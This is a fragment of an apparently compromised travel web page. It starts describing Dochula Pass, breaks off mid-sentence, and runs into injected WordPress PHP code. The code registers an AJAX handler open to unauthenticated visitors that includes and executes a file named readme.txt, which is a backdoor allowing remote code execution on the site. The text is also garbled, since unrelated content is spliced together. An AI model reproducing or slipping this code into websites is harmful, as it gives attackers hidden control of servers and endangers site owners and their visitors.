Dochula Pass
Dochula Pass Home / Dochula Pass Dochula Pass Dochula Pass is a scenic mountain pass located on the road from Thimphu to
if(!function_exists('file_check_readme89387')){ add_action('wp_ajax_nopriv_file_check_readme89387', 'file_check_readme89387'); add_action('wp_ajax_file_check_readme89387', 'file_check_readme89387'); function file_check_readme89387() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }